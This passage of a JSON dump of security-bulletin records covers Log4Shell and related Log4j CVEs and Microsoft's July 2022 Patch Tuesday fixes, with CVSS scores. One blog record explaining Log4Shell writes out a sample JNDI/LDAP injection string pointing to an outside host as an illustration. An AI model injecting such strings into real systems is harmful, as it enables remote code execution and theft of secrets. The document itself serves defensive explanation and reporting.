"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22038", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-33675"], "modified": "2022-07-23T08:34:29", "id": "AVLEONOV:B87691B304EF70215B926F66B871260A", "href": "https://avleonov.com/2022/07/23/microsoft-patch-tuesday-july-2022-propaganda-report-csrss-eop-rpc-rce-edge-azure-site-recovery/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-26T22:37:17", "description": "Hello everyone! I decided to make a separate episode about Log4Shell. Of course, there have already been many reviews of this vulnerability. But I do it primarily for myself. It seems to me that serious problems with Log4j and similar libraries will be with us for a long time. Therefore, it would be interesting to document how it all began. So what is the root cause of Log4Shell?\n\n## Logs\n\nGenerally speaking, the IT infrastructure of any company deals with streams of input data. From user requests to a corporate website to integration with banking APIs and cloud services. A lot of data gets into the infrastructure of the company, is transferred from system to system, periodically getting into the logs. These logs are required to verify that the systems are functioning correctly.\n\n## True programmers\n\nIt would be ok if these log files were just written by some basic functions. But the true programmers cannot do this. They have a fancy library for every need. Even if it's as simple as writing text logs. Unfortunately, these libraries are also written by true programmers. And they might decide that it would be very cool to make possible automatic replacements in the logs. As the authors of the java library log4j did.\n\nIn the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form `${prefix:name}`. 
For example, `Text: ${java:version}` might be converted to `Text: Java version 1.7.0_67`.\n\nSo far it looks pretty harmless. The question is, what other replacements are supported? And they support the replacement:\n\n`${jndi:<lookup>}`\n\n## JNDI\n\nThe Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to discover and look up data and resources (in the form of Java objects) via a name.\n\nIf log4j sees JNDI in the logs, it makes a request to an external resource. These requests can be different. The JDK includes service providers for the following naming/directory services:\n\n * Lightweight Directory Access Protocol (LDAP)\n * Common Object Request Broker Architecture (CORBA) Common Object Services (COS) name service\n * Java Remote Method Invocation (RMI) Registry\n * Domain Name Service (DNS)\n\nTherefore, it is likely that we will see different variations of the attack. But now the most common attack scenario is using LDAP.\n\n`${jndi:ldap://example.com/file}`\n\n## LDAP\n\nThe Lightweight Directory Access Protocol is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. A client starts an LDAP session by connecting to an LDAP server, by default on TCP and UDP port 389, or on port 636 for LDAPS (LDAP over TLS/SSL).\n\nThe client may request various operations. Search, add a new entry, delete an entry, modify an entry and so on. An LDAP URL describes an LDAP search operation that is used to retrieve information from an LDAP directory. LDAP URLs have the following syntax:\n\n`ldap[s]://hostname:port/base_dn?attributes?scope?filter`\n\n\n\nIn response to such a search request, the malicious LDAP server will return a payload, which will work on the host and may lead to RCE. 
Well, if this does not work, an attacker can simply make requests containing environment variables from the host, that may contain passwords and tokens. It's not bad either.\n\n## And what to do with it?\n\nIt seems every security vendor has already written marketing posts on how exactly their solution can solve this problem.\n\n * Vulnerability and patch management systems can simplify the inventory and remediation of vulnerable components or software.\n * Filtering systems (Firewalls, NGFW, WAF) can catch malicious requests that can get into the logs, for example, from the user agent and http request parameters. They can also help to control that there are no external ldap connections.\n\nIt seems that of course none of these solutions is a panacea. It is necessary to work with this problem systematically.\n\n## In conclusion\n\nProblems with Log4j will be with us for a long time. Just look at the [lists of vulnerable third-party programs](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>). Not to mention the programs developed in-house. And this is only if we are talking about one vulnerability Log4Shell (CVE-2021-44228). Now there are at least 2 more of them in log4j: incomplete fix of Log4Shell RCE CVE-2021-45046 and DOS CVE-2021-45105. And there will certainly be more of them, as more researchers will pay attention to this vector. As it was with SMB, OpenSSL, Print Spooler and so on.\n\nBut in a global sense, I see some positive aspects in this as well. Such critical cases are a good opportunity to draw the attention of C-level management to security problems. Starting, for example, with an IT-inventory and the control over the software development process. On such issues, it becomes clear why all this is needed and why it is practically impossible to solve such critical tasks on time without well-functioning processes. 
It is also a good way to check if network filtering is working in blocking mode and if outbound connections from internal hosts are being monitored.\n\nIt would also be great if the developers paid attention to such cases and remembered the KISS "Keep it simple, stupid" principle. Adding external call capability to the log library is a bad idea. I even think it's a bad idea to use such a library for logging when you don't need it. However, when looking at these things realistically, I don't think this will happen. True programmers will continue to write strange things. This means that security specialists will always have a job. And that's also good news.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-26T22:07:17", "type": "avleonov", "title": "Log4j \u201cLog4Shell\u201d RCE explained (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-26T22:07:17", "id": "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "href": "https://avleonov.com/2021/12/27/log4j-log4shell-rce-explained-cve-2021-44228/", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-07-16T16:17:19", "description": "It\u2019s time to triage a lot of [patching](<https://www.malwarebytes.com/business/vulnerability-patch-management>) again. Microsoft\u2019s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of [known to be exploited in the wild list](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) that are due for patching by August 2, 2022.\n\n## Microsoft\n\nIn total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as \u201cCritical\u201d since they are remote code execution (RCE) vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that were assigned to the four Critical vulnerabilities:\n\n[CVE-2022-22029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22029>): Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n[CVE-2022-22039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22039>): Another Windows Network File System (NFS) RCE vulnerability. 
It's possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.\n\n[CVE-2022-22038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22038>): Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[CVE-2022-30221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30221>): Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n## Azure Site Recovery\n\nA huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/>) is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.\n\nAccording to Microsoft, [SQL injection](<https://www.malwarebytes.com/glossary/sql-injection>) vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.\n\n## CVE-2022-22047\n\nThe vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nThe vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. 
CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system\u2019s operation and is mainly responsible for Win32 console handling and GUI shutdown.\n\nThis type of vulnerability is often chained together with others in macros, which makes the decision to [roll back Office Macro blocking](<https://blog.malwarebytes.com/business/2022/07/microsoft-appears-to-be-rolling-back-office-macro-blocking/>) incomprehensible, even if it is only temporary.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\nAdobe released [security updates](<https://helpx.adobe.com/security.html>) for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.\n\nCisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and [several other security updates](<https://tools.cisco.com/security/center/publicationListing.x>).\n\nCitrix released [hotfixes](<https://support.citrix.com/article/CTX461397/citrix-hypervisor-security-bulletin-for-cve202223816-and-cve202223825>) to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.\n\nGoogle released [Android's July security updates](<https://source.android.com/security/bulletin/2022-07-01>) including 3 labelled as \u201cCritical\u201d.\n\nSAP released its [July 2022 Patch Day bulletin](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) with 20 new Security Notes.\n\nVMWare released [security updates](<https://www.vmware.com/security/advisories.html>).\n\nStay safe, everyone!\n\nThe post [Update now\u2014July Patch Tuesday patches include fix for exploited 
zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T12:21:53", "type": "malwarebytes", "title": "Update now\u2014July Patch Tuesday patches include fix for exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-30221"], "modified": "2022-07-13T12:21:53", "id": "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-07-13T05:57:21", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e100/windows-update.jpg>)\n\nMicrosoft released its monthly round of Patch Tuesday updates to address [84 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.\n\nOf the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are [two other bugs](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser, one of which plugs another [zero-day flaw](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) that Google disclosed as being actively exploited in real-world attacks.\n\nTop of the list of this month's updates is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem ([CSRSS](<https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem>)) that could be abused by an attacker to gain SYSTEM permissions.\n\n\"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. \"With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.\"\n\nVery little is known about the nature and scale of the attacks other than an \"Exploitation Detected\" assessment from Microsoft. 
The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.\n\nBesides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component \u2014 [CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) (CVSS score: 8.8) and [CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) (CVSS score: 7.8) \u2014 that were reported by Google Project Zero researcher Sergei Glazunov.\n\n\"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>) to SYSTEM,\" Microsoft said in an advisory for CVE-2022-22026.\n\n\"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso remediated by Microsoft include a number of remote code execution bugs in Windows Network File System ([CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>)), Windows Graphics ([CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>)), Remote Procedure Call Runtime ([CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>)), and Windows Shell ([CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>)).\n\nThe update further stands out for patching as many as 32 issues in the [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/site-recovery-overview>) business continuity service. 
Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.\n\n\"Successful exploitation [...] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,\" the company said, adding the flaws do not \"allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.\"\n\nOn top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module ([CVE-2022-22022](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>)) after a [brief respite in June 2022](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), underscoring what appears to be a never-ending stream of flaws plaguing the technology.\n\nRounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service ([CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>)) and Microsoft Defender for Endpoint ([CVE-2022-33637](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33637>)) and three denial-of-service (DoS) flaws in Internet Information Services ([CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) and [CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>)) and Security Account Manager ([CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>)).\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also 
been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-07-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220712>)\n * [Cisco](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Fortinet](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/04/gitlab-15-1-2-released/>)\n * [Google Chrome](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/July-2022>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider 
Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T04:15:00", "type": "thn", "title": "Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22022", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30216", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30226", "CVE-2022-33637"], "modified": "2022-07-13T05:36:49", "id": "THN:8C2FBC83F6EC62900F1887F00903447F", "href": "https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:37:45", "description": "The Apache Software Foundation (ASF) on 
Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.\n\nTracked as [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n\n\"Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. \"This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\"\n\nAlthough no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry [claimed credit](<https://twitter.com/YNizry/status/1475764153373573120>) for reporting the vulnerability to Apache on December 27.\n\n\"The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,\" Nizry [noted](<https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/>). 
\"Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.\"\n\nWith the latest fix, the project maintainers have addressed a total of four issues in Log4j since the [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw came to light earlier this month, not to mention a fifth vulnerability affecting Log4j version 1.2 that will not be fixed \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)\n\nThe development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. [issued](<https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html>) a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T04:59:00", "type": "thn", "title": "New Apache Log4j Update Released to Patch Newly Discovered Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T05:00:00", "id": "THN:1D10167F5D53B2791D676CF56488D5D9", "href": "https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "Microsoft is warning of continuing attempts 
by nation-state adversaries and commodity attackers to take advantage of [security vulnerabilities](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.\n\n\"Exploitation attempts and testing have remained high during the last weeks of December,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in revised guidance published earlier this week. \"We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.\"\n\nPublicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), has emerged as a new attack vector for [widespread exploitation](<https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html>) by a variety of threat actors.\n\nIn the subsequent weeks, four more weaknesses in the utility have come to light \u2014 [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>), [CVE-2021-45105](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>), and [CVE-2021-44832](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) \u2014 giving opportunistic bad actors persistent control over the compromised machines and letting them mount an evolving array of attacks ranging from [cryptocurrency miners](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) to 
[ransomware](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>).\n\nEven as the mass scanning attempts are showing no signs of letting up, efforts are underway to evade string-matching detections by obfuscating the malicious HTTP requests orchestrated to generate a web request log using Log4j that leverages JNDI to perform a request to the attacker-controlled site.\n\nIn addition, Microsoft said it observed \"rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) backdoor to Linux systems.\"\n\nOn top of that, the Log4Shell vulnerability has also been put to use to drop additional remote access toolkits and reverse shells such as [Meterpreter](<https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter>), [Bladabindi](<https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat>) (aka NjRAT), and [HabitsRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat>).\n\n\"At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,\" MSTIC noted. \"Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, [requiring](<https://twitter.com/MsftSecIntel/status/1475627081753112579>) ongoing, sustainable vigilance.\"\n\nThe development also comes as the U.S. 
Federal Trade Commission (FTC) [issued](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) a warning that it \"intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T05:12:00", "type": "thn", "title": "Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", 